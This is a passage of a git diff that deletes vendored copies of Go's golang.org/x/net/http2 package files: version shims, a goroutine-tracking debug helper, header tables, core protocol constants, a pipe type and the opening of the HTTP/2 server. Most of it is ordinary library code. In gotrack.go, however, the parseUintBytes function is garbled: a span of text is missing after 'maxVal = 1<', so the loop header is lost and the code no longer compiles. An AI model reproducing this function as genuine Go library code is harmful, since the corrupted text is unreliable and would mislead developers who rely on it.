cc.ping(ctx) -} diff --git a/vendor/golang.org/x/net/http2/go17_not18.go b/vendor/golang.org/x/net/http2/go17_not18.go deleted file mode 100644 index b4c52ece..00000000 --- a/vendor/golang.org/x/net/http2/go17_not18.go +++ /dev/null @@ -1,36 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.7,!go1.8 - -package http2 - -import "crypto/tls" - -// temporary copy of Go 1.7's private tls.Config.clone: -func cloneTLSConfig(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, - Renegotiation: c.Renegotiation, - } -} diff --git a/vendor/golang.org/x/net/http2/go18.go b/vendor/golang.org/x/net/http2/go18.go deleted file mode 100644 index 4f30d228..00000000 --- a/vendor/golang.org/x/net/http2/go18.go +++ /dev/null @@ -1,56 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.8 - -package http2 - -import ( - "crypto/tls" - "io" - "net/http" -) - -func cloneTLSConfig(c *tls.Config) *tls.Config { - c2 := c.Clone() - c2.GetClientCertificate = c.GetClientCertificate // golang.org/issue/19264 - return c2 -} - -var _ http.Pusher = (*responseWriter)(nil) - -// Push implements http.Pusher. -func (w *responseWriter) Push(target string, opts *http.PushOptions) error { - internalOpts := pushOptions{} - if opts != nil { - internalOpts.Method = opts.Method - internalOpts.Header = opts.Header - } - return w.push(target, internalOpts) -} - -func configureServer18(h1 *http.Server, h2 *Server) error { - if h2.IdleTimeout == 0 { - if h1.IdleTimeout != 0 { - h2.IdleTimeout = h1.IdleTimeout - } else { - h2.IdleTimeout = h1.ReadTimeout - } - } - return nil -} - -func shouldLogPanic(panicValue interface{}) bool { - return panicValue != nil && panicValue != http.ErrAbortHandler -} - -func reqGetBody(req *http.Request) func() (io.ReadCloser, error) { - return req.GetBody -} - -func reqBodyIsNoBody(body io.ReadCloser) bool { - return body == http.NoBody -} - -func go18httpNoBody() io.ReadCloser { return http.NoBody } // for tests only diff --git a/vendor/golang.org/x/net/http2/go19.go b/vendor/golang.org/x/net/http2/go19.go deleted file mode 100644 index 38124ba5..00000000 --- a/vendor/golang.org/x/net/http2/go19.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build go1.9 - -package http2 - -import ( - "net/http" -) - -func configureServer19(s *http.Server, conf *Server) error { - s.RegisterOnShutdown(conf.state.startGracefulShutdown) - return nil -} diff --git a/vendor/golang.org/x/net/http2/gotrack.go b/vendor/golang.org/x/net/http2/gotrack.go deleted file mode 100644 index 9933c9f8..00000000 --- a/vendor/golang.org/x/net/http2/gotrack.go +++ /dev/null @@ -1,170 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Defensive debug-only utility to track that functions run on the -// goroutine that they're supposed to. - -package http2 - -import ( - "bytes" - "errors" - "fmt" - "os" - "runtime" - "strconv" - "sync" -) - -var DebugGoroutines = os.Getenv("DEBUG_HTTP2_GOROUTINES") == "1" - -type goroutineLock uint64 - -func newGoroutineLock() goroutineLock { - if !DebugGoroutines { - return 0 - } - return goroutineLock(curGoroutineID()) -} - -func (g goroutineLock) check() { - if !DebugGoroutines { - return - } - if curGoroutineID() != uint64(g) { - panic("running on the wrong goroutine") - } -} - -func (g goroutineLock) checkNotOn() { - if !DebugGoroutines { - return - } - if curGoroutineID() == uint64(g) { - panic("running on the wrong goroutine") - } -} - -var goroutineSpace = []byte("goroutine ") - -func curGoroutineID() uint64 { - bp := littleBuf.Get().(*[]byte) - defer littleBuf.Put(bp) - b := *bp - b = b[:runtime.Stack(b, false)] - // Parse the 4707 out of "goroutine 4707 [" - b = bytes.TrimPrefix(b, goroutineSpace) - i := bytes.IndexByte(b, ' ') - if i < 0 { - panic(fmt.Sprintf("No space found in %q", b)) - } - b = b[:i] - n, err := parseUintBytes(b, 10, 64) - if err != nil { - panic(fmt.Sprintf("Failed to parse goroutine ID out of %q: %v", b, err)) - } - return n -} - -var littleBuf = sync.Pool{ - New: func() interface{} { - buf := make([]byte, 64) - return &buf - }, -} - -// parseUintBytes is like strconv.ParseUint, but using a []byte. -func parseUintBytes(s []byte, base int, bitSize int) (n uint64, err error) { - var cutoff, maxVal uint64 - - if bitSize == 0 { - bitSize = int(strconv.IntSize) - } - - s0 := s - switch { - case len(s) < 1: - err = strconv.ErrSyntax - goto Error - - case 2 <= base && base <= 36: - // valid base; nothing to do - - case base == 0: - // Look for octal, hex prefix. - switch { - case s[0] == '0' && len(s) > 1 && (s[1] == 'x' || s[1] == 'X'): - base = 16 - s = s[2:] - if len(s) < 1 { - err = strconv.ErrSyntax - goto Error - } - case s[0] == '0': - base = 8 - default: - base = 10 - } - - default: - err = errors.New("invalid base " + strconv.Itoa(base)) - goto Error - } - - n = 0 - cutoff = cutoff64(base) - maxVal = 1<= base { - n = 0 - err = strconv.ErrSyntax - goto Error - } - - if n >= cutoff { - // n*base overflows - n = 1<<64 - 1 - err = strconv.ErrRange - goto Error - } - n *= uint64(base) - - n1 := n + uint64(v) - if n1 < n || n1 > maxVal { - // n+v overflows - n = 1<<64 - 1 - err = strconv.ErrRange - goto Error - } - n = n1 - } - - return n, nil - -Error: - return n, &strconv.NumError{Func: "ParseUint", Num: string(s0), Err: err} -} - -// Return the first number n such that n*base >= 1<<64. -func cutoff64(base int) uint64 { - if base < 2 { - return 0 - } - return (1<<64-1)/uint64(base) + 1 -} diff --git a/vendor/golang.org/x/net/http2/headermap.go b/vendor/golang.org/x/net/http2/headermap.go deleted file mode 100644 index c2805f6a..00000000 --- a/vendor/golang.org/x/net/http2/headermap.go +++ /dev/null @@ -1,78 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "net/http" - "strings" -) - -var ( - commonLowerHeader = map[string]string{} // Go-Canonical-Case -> lower-case - commonCanonHeader = map[string]string{} // lower-case -> Go-Canonical-Case -) - -func init() { - for _, v := range []string{ - "accept", - "accept-charset", - "accept-encoding", - "accept-language", - "accept-ranges", - "age", - "access-control-allow-origin", - "allow", - "authorization", - "cache-control", - "content-disposition", - "content-encoding", - "content-language", - "content-length", - "content-location", - "content-range", - "content-type", - "cookie", - "date", - "etag", - "expect", - "expires", - "from", - "host", - "if-match", - "if-modified-since", - "if-none-match", - "if-unmodified-since", - "last-modified", - "link", - "location", - "max-forwards", - "proxy-authenticate", - "proxy-authorization", - "range", - "referer", - "refresh", - "retry-after", - "server", - "set-cookie", - "strict-transport-security", - "trailer", - "transfer-encoding", - "user-agent", - "vary", - "via", - "www-authenticate", - } { - chk := http.CanonicalHeaderKey(v) - commonLowerHeader[chk] = v - commonCanonHeader[v] = chk - } -} - -func lowerHeader(v string) string { - if s, ok := commonLowerHeader[v]; ok { - return s - } - return strings.ToLower(v) -} diff --git a/vendor/golang.org/x/net/http2/http2.go b/vendor/golang.org/x/net/http2/http2.go deleted file mode 100644 index d565f40e..00000000 --- a/vendor/golang.org/x/net/http2/http2.go +++ /dev/null @@ -1,391 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Package http2 implements the HTTP/2 protocol. -// -// This package is low-level and intended to be used directly by very -// few people. Most users will use it indirectly through the automatic -// use by the net/http package (from Go 1.6 and later). -// For use in earlier Go versions see ConfigureServer. (Transport support -// requires Go 1.6 or later) -// -// See https://http2.github.io/ for more information on HTTP/2. -// -// See https://http2.golang.org/ for a test server running this code. -// -package http2 // import "golang.org/x/net/http2" - -import ( - "bufio" - "crypto/tls" - "errors" - "fmt" - "io" - "net/http" - "os" - "sort" - "strconv" - "strings" - "sync" - - "golang.org/x/net/lex/httplex" -) - -var ( - VerboseLogs bool - logFrameWrites bool - logFrameReads bool - inTests bool -) - -func init() { - e := os.Getenv("GODEBUG") - if strings.Contains(e, "http2debug=1") { - VerboseLogs = true - } - if strings.Contains(e, "http2debug=2") { - VerboseLogs = true - logFrameWrites = true - logFrameReads = true - } -} - -const ( - // ClientPreface is the string that must be sent by new - // connections from clients. - ClientPreface = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n" - - // SETTINGS_MAX_FRAME_SIZE default - // http://http2.github.io/http2-spec/#rfc.section.6.5.2 - initialMaxFrameSize = 16384 - - // NextProtoTLS is the NPN/ALPN protocol negotiated during - // HTTP/2's TLS setup. - NextProtoTLS = "h2" - - // http://http2.github.io/http2-spec/#SettingValues - initialHeaderTableSize = 4096 - - initialWindowSize = 65535 // 6.9.2 Initial Flow Control Window Size - - defaultMaxReadFrameSize = 1 << 20 -) - -var ( - clientPreface = []byte(ClientPreface) -) - -type streamState int - -// HTTP/2 stream states. -// -// See http://tools.ietf.org/html/rfc7540#section-5.1. -// -// For simplicity, the server code merges "reserved (local)" into -// "half-closed (remote)". This is one less state transition to track. -// The only downside is that we send PUSH_PROMISEs slightly less -// liberally than allowable. More discussion here: -// https://lists.w3.org/Archives/Public/ietf-http-wg/2016JulSep/0599.html -// -// "reserved (remote)" is omitted since the client code does not -// support server push. -const ( - stateIdle streamState = iota - stateOpen - stateHalfClosedLocal - stateHalfClosedRemote - stateClosed -) - -var stateName = [...]string{ - stateIdle: "Idle", - stateOpen: "Open", - stateHalfClosedLocal: "HalfClosedLocal", - stateHalfClosedRemote: "HalfClosedRemote", - stateClosed: "Closed", -} - -func (st streamState) String() string { - return stateName[st] -} - -// Setting is a setting parameter: which setting it is, and its value. -type Setting struct { - // ID is which setting is being set. - // See http://http2.github.io/http2-spec/#SettingValues - ID SettingID - - // Val is the value. - Val uint32 -} - -func (s Setting) String() string { - return fmt.Sprintf("[%v = %d]", s.ID, s.Val) -} - -// Valid reports whether the setting is valid. -func (s Setting) Valid() error { - // Limits and error codes from 6.5.2 Defined SETTINGS Parameters - switch s.ID { - case SettingEnablePush: - if s.Val != 1 && s.Val != 0 { - return ConnectionError(ErrCodeProtocol) - } - case SettingInitialWindowSize: - if s.Val > 1<<31-1 { - return ConnectionError(ErrCodeFlowControl) - } - case SettingMaxFrameSize: - if s.Val < 16384 || s.Val > 1<<24-1 { - return ConnectionError(ErrCodeProtocol) - } - } - return nil -} - -// A SettingID is an HTTP/2 setting as defined in -// http://http2.github.io/http2-spec/#iana-settings -type SettingID uint16 - -const ( - SettingHeaderTableSize SettingID = 0x1 - SettingEnablePush SettingID = 0x2 - SettingMaxConcurrentStreams SettingID = 0x3 - SettingInitialWindowSize SettingID = 0x4 - SettingMaxFrameSize SettingID = 0x5 - SettingMaxHeaderListSize SettingID = 0x6 -) - -var settingName = map[SettingID]string{ - SettingHeaderTableSize: "HEADER_TABLE_SIZE", - SettingEnablePush: "ENABLE_PUSH", - SettingMaxConcurrentStreams: "MAX_CONCURRENT_STREAMS", - SettingInitialWindowSize: "INITIAL_WINDOW_SIZE", - SettingMaxFrameSize: "MAX_FRAME_SIZE", - SettingMaxHeaderListSize: "MAX_HEADER_LIST_SIZE", -} - -func (s SettingID) String() string { - if v, ok := settingName[s]; ok { - return v - } - return fmt.Sprintf("UNKNOWN_SETTING_%d", uint16(s)) -} - -var ( - errInvalidHeaderFieldName = errors.New("http2: invalid header field name") - errInvalidHeaderFieldValue = errors.New("http2: invalid header field value") -) - -// validWireHeaderFieldName reports whether v is a valid header field -// name (key). See httplex.ValidHeaderName for the base rules. -// -// Further, http2 says: -// "Just as in HTTP/1.x, header field names are strings of ASCII -// characters that are compared in a case-insensitive -// fashion. However, header field names MUST be converted to -// lowercase prior to their encoding in HTTP/2. " -func validWireHeaderFieldName(v string) bool { - if len(v) == 0 { - return false - } - for _, r := range v { - if !httplex.IsTokenRune(r) { - return false - } - if 'A' <= r && r <= 'Z' { - return false - } - } - return true -} - -var httpCodeStringCommon = map[int]string{} // n -> strconv.Itoa(n) - -func init() { - for i := 100; i <= 999; i++ { - if v := http.StatusText(i); v != "" { - httpCodeStringCommon[i] = strconv.Itoa(i) - } - } -} - -func httpCodeString(code int) string { - if s, ok := httpCodeStringCommon[code]; ok { - return s - } - return strconv.Itoa(code) -} - -// from pkg io -type stringWriter interface { - WriteString(s string) (n int, err error) -} - -// A gate lets two goroutines coordinate their activities. -type gate chan struct{} - -func (g gate) Done() { g <- struct{}{} } -func (g gate) Wait() { <-g } - -// A closeWaiter is like a sync.WaitGroup but only goes 1 to 0 (open to closed). -type closeWaiter chan struct{} - -// Init makes a closeWaiter usable. -// It exists because so a closeWaiter value can be placed inside a -// larger struct and have the Mutex and Cond's memory in the same -// allocation. -func (cw *closeWaiter) Init() { - *cw = make(chan struct{}) -} - -// Close marks the closeWaiter as closed and unblocks any waiters. -func (cw closeWaiter) Close() { - close(cw) -} - -// Wait waits for the closeWaiter to become closed. -func (cw closeWaiter) Wait() { - <-cw -} - -// bufferedWriter is a buffered writer that writes to w. -// Its buffered writer is lazily allocated as needed, to minimize -// idle memory usage with many connections. -type bufferedWriter struct { - w io.Writer // immutable - bw *bufio.Writer // non-nil when data is buffered -} - -func newBufferedWriter(w io.Writer) *bufferedWriter { - return &bufferedWriter{w: w} -} - -// bufWriterPoolBufferSize is the size of bufio.Writer's -// buffers created using bufWriterPool. -// -// TODO: pick a less arbitrary value? this is a bit under -// (3 x typical 1500 byte MTU) at least. Other than that, -// not much thought went into it. -const bufWriterPoolBufferSize = 4 << 10 - -var bufWriterPool = sync.Pool{ - New: func() interface{} { - return bufio.NewWriterSize(nil, bufWriterPoolBufferSize) - }, -} - -func (w *bufferedWriter) Available() int { - if w.bw == nil { - return bufWriterPoolBufferSize - } - return w.bw.Available() -} - -func (w *bufferedWriter) Write(p []byte) (n int, err error) { - if w.bw == nil { - bw := bufWriterPool.Get().(*bufio.Writer) - bw.Reset(w.w) - w.bw = bw - } - return w.bw.Write(p) -} - -func (w *bufferedWriter) Flush() error { - bw := w.bw - if bw == nil { - return nil - } - err := bw.Flush() - bw.Reset(nil) - bufWriterPool.Put(bw) - w.bw = nil - return err -} - -func mustUint31(v int32) uint32 { - if v < 0 || v > 2147483647 { - panic("out of range") - } - return uint32(v) -} - -// bodyAllowedForStatus reports whether a given response status code -// permits a body. See RFC 2616, section 4.4. -func bodyAllowedForStatus(status int) bool { - switch { - case status >= 100 && status <= 199: - return false - case status == 204: - return false - case status == 304: - return false - } - return true -} - -type httpError struct { - msg string - timeout bool -} - -func (e *httpError) Error() string { return e.msg } -func (e *httpError) Timeout() bool { return e.timeout } -func (e *httpError) Temporary() bool { return true } - -var errTimeout error = &httpError{msg: "http2: timeout awaiting response headers", timeout: true} - -type connectionStater interface { - ConnectionState() tls.ConnectionState -} - -var sorterPool = sync.Pool{New: func() interface{} { return new(sorter) }} - -type sorter struct { - v []string // owned by sorter -} - -func (s *sorter) Len() int { return len(s.v) } -func (s *sorter) Swap(i, j int) { s.v[i], s.v[j] = s.v[j], s.v[i] } -func (s *sorter) Less(i, j int) bool { return s.v[i] < s.v[j] } - -// Keys returns the sorted keys of h. -// -// The returned slice is only valid until s used again or returned to -// its pool. -func (s *sorter) Keys(h http.Header) []string { - keys := s.v[:0] - for k := range h { - keys = append(keys, k) - } - s.v = keys - sort.Sort(s) - return keys -} - -func (s *sorter) SortStrings(ss []string) { - // Our sorter works on s.v, which sorter owns, so - // stash it away while we sort the user's buffer. - save := s.v - s.v = ss - sort.Sort(s) - s.v = save -} - -// validPseudoPath reports whether v is a valid :path pseudo-header -// value. It must be either: -// -// *) a non-empty string starting with '/' -// *) the string '*', for OPTIONS requests. -// -// For now this is only used a quick check for deciding when to clean -// up Opaque URLs before sending requests from the Transport. -// See golang.org/issue/16847 -// -// We used to enforce that the path also didn't start with "//", but -// Google's GFE accepts such paths and Chrome sends them, so ignore -// that part of the spec. See golang.org/issue/19103. -func validPseudoPath(v string) bool { - return (len(v) > 0 && v[0] == '/') || v == "*" -} diff --git a/vendor/golang.org/x/net/http2/not_go16.go b/vendor/golang.org/x/net/http2/not_go16.go deleted file mode 100644 index 508cebcc..00000000 --- a/vendor/golang.org/x/net/http2/not_go16.go +++ /dev/null @@ -1,21 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.6 - -package http2 - -import ( - "net/http" - "time" -) - -func configureTransport(t1 *http.Transport) (*Transport, error) { - return nil, errTransportVersion -} - -func transportExpectContinueTimeout(t1 *http.Transport) time.Duration { - return 0 - -} diff --git a/vendor/golang.org/x/net/http2/not_go17.go b/vendor/golang.org/x/net/http2/not_go17.go deleted file mode 100644 index 140434a7..00000000 --- a/vendor/golang.org/x/net/http2/not_go17.go +++ /dev/null @@ -1,87 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.7 - -package http2 - -import ( - "crypto/tls" - "net" - "net/http" - "time" -) - -type contextContext interface { - Done() <-chan struct{} - Err() error -} - -type fakeContext struct{} - -func (fakeContext) Done() <-chan struct{} { return nil } -func (fakeContext) Err() error { panic("should not be called") } - -func reqContext(r *http.Request) fakeContext { - return fakeContext{} -} - -func setResponseUncompressed(res *http.Response) { - // Nothing. -} - -type clientTrace struct{} - -func requestTrace(*http.Request) *clientTrace { return nil } -func traceGotConn(*http.Request, *ClientConn) {} -func traceFirstResponseByte(*clientTrace) {} -func traceWroteHeaders(*clientTrace) {} -func traceWroteRequest(*clientTrace, error) {} -func traceGot100Continue(trace *clientTrace) {} -func traceWait100Continue(trace *clientTrace) {} - -func nop() {} - -func serverConnBaseContext(c net.Conn, opts *ServeConnOpts) (ctx contextContext, cancel func()) { - return nil, nop -} - -func contextWithCancel(ctx contextContext) (_ contextContext, cancel func()) { - return ctx, nop -} - -func requestWithContext(req *http.Request, ctx contextContext) *http.Request { - return req -} - -// temporary copy of Go 1.6's private tls.Config.clone: -func cloneTLSConfig(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - } -} - -func (cc *ClientConn) Ping(ctx contextContext) error { - return cc.ping(ctx) -} - -func (t *Transport) idleConnTimeout() time.Duration { return 0 } diff --git a/vendor/golang.org/x/net/http2/not_go18.go b/vendor/golang.org/x/net/http2/not_go18.go deleted file mode 100644 index 6f8d3f86..00000000 --- a/vendor/golang.org/x/net/http2/not_go18.go +++ /dev/null @@ -1,29 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.8 - -package http2 - -import ( - "io" - "net/http" -) - -func configureServer18(h1 *http.Server, h2 *Server) error { - // No IdleTimeout to sync prior to Go 1.8. - return nil -} - -func shouldLogPanic(panicValue interface{}) bool { - return panicValue != nil -} - -func reqGetBody(req *http.Request) func() (io.ReadCloser, error) { - return nil -} - -func reqBodyIsNoBody(io.ReadCloser) bool { return false } - -func go18httpNoBody() io.ReadCloser { return nil } // for tests only diff --git a/vendor/golang.org/x/net/http2/not_go19.go b/vendor/golang.org/x/net/http2/not_go19.go deleted file mode 100644 index 5ae07726..00000000 --- a/vendor/golang.org/x/net/http2/not_go19.go +++ /dev/null @@ -1,16 +0,0 @@ -// Copyright 2016 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build !go1.9 - -package http2 - -import ( - "net/http" -) - -func configureServer19(s *http.Server, conf *Server) error { - // not supported prior to go1.9 - return nil -} diff --git a/vendor/golang.org/x/net/http2/pipe.go b/vendor/golang.org/x/net/http2/pipe.go deleted file mode 100644 index a6140099..00000000 --- a/vendor/golang.org/x/net/http2/pipe.go +++ /dev/null @@ -1,163 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "errors" - "io" - "sync" -) - -// pipe is a goroutine-safe io.Reader/io.Writer pair. It's like -// io.Pipe except there are no PipeReader/PipeWriter halves, and the -// underlying buffer is an interface. (io.Pipe is always unbuffered) -type pipe struct { - mu sync.Mutex - c sync.Cond // c.L lazily initialized to &p.mu - b pipeBuffer // nil when done reading - err error // read error once empty. non-nil means closed. - breakErr error // immediate read error (caller doesn't see rest of b) - donec chan struct{} // closed on error - readFn func() // optional code to run in Read before error -} - -type pipeBuffer interface { - Len() int - io.Writer - io.Reader -} - -func (p *pipe) Len() int { - p.mu.Lock() - defer p.mu.Unlock() - if p.b == nil { - return 0 - } - return p.b.Len() -} - -// Read waits until data is available and copies bytes -// from the buffer into p. -func (p *pipe) Read(d []byte) (n int, err error) { - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - for { - if p.breakErr != nil { - return 0, p.breakErr - } - if p.b != nil && p.b.Len() > 0 { - return p.b.Read(d) - } - if p.err != nil { - if p.readFn != nil { - p.readFn() // e.g. copy trailers - p.readFn = nil // not sticky like p.err - } - p.b = nil - return 0, p.err - } - p.c.Wait() - } -} - -var errClosedPipeWrite = errors.New("write on closed buffer") - -// Write copies bytes from p into the buffer and wakes a reader. -// It is an error to write more data than the buffer can hold. -func (p *pipe) Write(d []byte) (n int, err error) { - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - defer p.c.Signal() - if p.err != nil { - return 0, errClosedPipeWrite - } - if p.breakErr != nil { - return len(d), nil // discard when there is no reader - } - return p.b.Write(d) -} - -// CloseWithError causes the next Read (waking up a current blocked -// Read if needed) to return the provided err after all data has been -// read. -// -// The error must be non-nil. -func (p *pipe) CloseWithError(err error) { p.closeWithError(&p.err, err, nil) } - -// BreakWithError causes the next Read (waking up a current blocked -// Read if needed) to return the provided err immediately, without -// waiting for unread data. -func (p *pipe) BreakWithError(err error) { p.closeWithError(&p.breakErr, err, nil) } - -// closeWithErrorAndCode is like CloseWithError but also sets some code to run -// in the caller's goroutine before returning the error. -func (p *pipe) closeWithErrorAndCode(err error, fn func()) { p.closeWithError(&p.err, err, fn) } - -func (p *pipe) closeWithError(dst *error, err error, fn func()) { - if err == nil { - panic("err must be non-nil") - } - p.mu.Lock() - defer p.mu.Unlock() - if p.c.L == nil { - p.c.L = &p.mu - } - defer p.c.Signal() - if *dst != nil { - // Already been done. - return - } - p.readFn = fn - if dst == &p.breakErr { - p.b = nil - } - *dst = err - p.closeDoneLocked() -} - -// requires p.mu be held. -func (p *pipe) closeDoneLocked() { - if p.donec == nil { - return - } - // Close if unclosed. This isn't racy since we always - // hold p.mu while closing. - select { - case <-p.donec: - default: - close(p.donec) - } -} - -// Err returns the error (if any) first set by BreakWithError or CloseWithError. -func (p *pipe) Err() error { - p.mu.Lock() - defer p.mu.Unlock() - if p.breakErr != nil { - return p.breakErr - } - return p.err -} - -// Done returns a channel which is closed if and when this pipe is closed -// with CloseWithError. -func (p *pipe) Done() <-chan struct{} { - p.mu.Lock() - defer p.mu.Unlock() - if p.donec == nil { - p.donec = make(chan struct{}) - if p.err != nil || p.breakErr != nil { - // Already hit an error. - p.closeDoneLocked() - } - } - return p.donec -} diff --git a/vendor/golang.org/x/net/http2/server.go b/vendor/golang.org/x/net/http2/server.go deleted file mode 100644 index eae143dd..00000000 --- a/vendor/golang.org/x/net/http2/server.go +++ /dev/null @@ -1,2857 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// TODO: turn off the serve goroutine when idle, so -// an idle conn only has the readFrames goroutine active. (which could -// also be optimized probably to pin less memory in crypto/tls). This -// would involve tracking when the serve goroutine is active (atomic -// int32 read/CAS probably?) and starting it up when frames arrive, -// and shutting it down when all handlers exit. the occasional PING -// packets could use time.AfterFunc to call sc.wakeStartServeLoop() -// (which is a no-op if already running) and then queue the PING write -// as normal. The serve loop would then exit in most cases (if no -// Handlers running) and not be woken up again until the PING packet -// returns. - -// TODO (maybe): add a mechanism for Handlers to going into -// half-closed-local mode (rw.(io.Closer) test?) but not exit their -// handler, and continue to be able to read from the -// Request.Body. This would be a somewhat semantic change from HTTP/1 -// (or at least what we expose in net/http), so I'd probably want to -// add it there too. For now, this package says that returning from -// the Handler ServeHTTP function means you're both done reading and -// done writing, without a way to stop just one or the other. - -package http2 - -import ( - "bufio" - "bytes" - "crypto/tls" - "errors" - "fmt" - "io" - "log" - "math" - "net" - "net/http" - "net/textproto" - "net/url" - "os" - "reflect" - "runtime" - "strconv" - "strings" - "sync" - "time" - - "golang.org/x/net/http2/hpack" -) - -const ( - prefaceTimeout = 10 * time.Second - firstSettingsTimeout = 2 * time.Second // should be in-flight with preface anyway - handlerChunkWriteSize = 4 << 10 - defaultMaxStreams = 250 // TODO: make this 100 as the GFE seems to? -) - -var ( - errClientDisconnected = errors.New("client disconnected") - errClosedBody = errors.New("body closed by handler") - errHandlerComplete = errors.New("http2: request body closed due to handler exiting") - errStreamClosed = errors.New("http2: stream closed") -) - -var responseWriterStatePool = sync.Pool{ - New: func() interface{} { - rws := &responseWriterState{} - rws.bw = bufio.NewWriterSize(chunkWriter{rws}, handlerChunkWriteSize) - return rws - }, -} - -// Test hooks. -var ( - testHookOnConn func() - testHookGetServerConn func(*serverConn) - testHookOnPanicMu *sync.Mutex // nil except in tests - testHookOnPanic func(sc *serverConn, panicVal interface{}) (rePanic bool) -) - -// Server is an HTTP/2 server. -type Server struct { - // MaxHandlers limits the number of http.Handler ServeHTTP goroutines - // which may run at a time over all connections. - // Negative or zero no limit. - // TODO: implement - MaxHandlers int - - // MaxConcurrentStreams optionally specifies the number of - // concurrent streams that each client may have open at a - // time. This is unrelated to the number of http.Handler goroutines - // which may be active globally, which is MaxHandlers. - // If zero, MaxConcurrentStreams defaults to at least 100, per - // the HTTP/2 spec's recommendations. - MaxConcurrentStreams uint32 - - // MaxReadFrameSize optionally specifies the largest frame - // this server is willing to read. A valid value is between - // 16k and 16M, inclusive. If zero or otherwise invalid, a - // default value is used. - MaxReadFrameSize uint32 - - // PermitProhibitedCipherSuites, if true, permits the use of - // cipher suites prohibited by the HTTP/2 spec. - PermitProhibitedCipherSuites bool - - // IdleTimeout specifies how long until idle clients should be - // closed with a GOAWAY frame. PING frames are not considered - // activity for the purposes of IdleTimeout. - IdleTimeout time.Duration - - // MaxUploadBufferPerConnection is the size of the initial flow - // control window for each connections. The HTTP/2 spec does not - // allow this to be smaller than 65535 or larger than 2^32-1. - // If the value is outside this range, a default value will be - // used instead. - MaxUploadBufferPerConnection int32 - - // MaxUploadBufferPerStream is the size of the initial flow control - // window for each stream. The HTTP/2 spec does not allow this to - // be larger than 2^32-1. If the value is zero or larger than the - // maximum, a default value will be used instead. - MaxUploadBufferPerStream int32 - - // NewWriteScheduler constructs a write scheduler for a connection. - // If nil, a default scheduler is chosen. - NewWriteScheduler func() WriteScheduler - - // Internal state. This is a pointer (rather than embedded directly) - // so that we don't embed a Mutex in this struct, which will make the - // struct non-copyable, which might break some callers. - state *serverInternalState -} - -func (s *Server) initialConnRecvWindowSize() int32 { - if s.MaxUploadBufferPerConnection > initialWindowSize { - return s.MaxUploadBufferPerConnection - } - return 1 << 20 -} - -func (s *Server) initialStreamRecvWindowSize() int32 { - if s.MaxUploadBufferPerStream > 0 { - return s.MaxUploadBufferPerStream - } - return 1 << 20 -} - -func (s *Server) maxReadFrameSize() uint32 { - if v := s.MaxReadFrameSize; v >= minMaxFrameSize && v <= maxFrameSize { - return v - } - return defaultMaxReadFrameSize -} - -func (s *Server) maxConcurrentStreams() uint32 { - if v := s.MaxConcurrentStreams; v > 0 { - return v - } - return defaultMaxStreams -} - -type serverInternalState struct { - mu sync.Mutex - activeConns map[*serverConn]struct{} -} - -func (s *serverInternalState) registerConn(sc *serverConn) { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - s.activeConns[sc] = struct{}{} - s.mu.Unlock() -} - -func (s *serverInternalState) unregisterConn(sc *serverConn) { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - delete(s.activeConns, sc) - s.mu.Unlock() -} - -func (s *serverInternalState) startGracefulShutdown() { - if s == nil { - return // if the Server was used without calling ConfigureServer - } - s.mu.Lock() - for sc := range s.activeConns { - 